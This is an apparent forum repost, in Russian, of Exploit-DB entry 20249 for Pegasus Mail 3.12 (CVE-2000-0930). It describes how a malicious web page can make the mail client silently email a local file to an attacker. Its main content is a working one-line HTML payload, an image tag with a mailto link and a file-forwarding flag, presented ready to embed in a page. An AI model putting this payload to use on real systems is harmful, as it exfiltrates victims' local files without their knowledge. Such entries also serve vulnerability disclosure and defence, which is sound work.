Exploit David Harris Pegasus Mail 3.12 - File Forwarding

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20249
Проверка EDB
  1. Пройдено
Автор
IMRAN GHORY
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0930
Дата публикации
2000-10-03
Код:
source: https://www.securityfocus.com/bid/1738/info

It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client.

If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning:

<img sr c="mailto:[email protected] -F c:\path\file.ext">
 
Источник
www.exploit-db.com

Похожие темы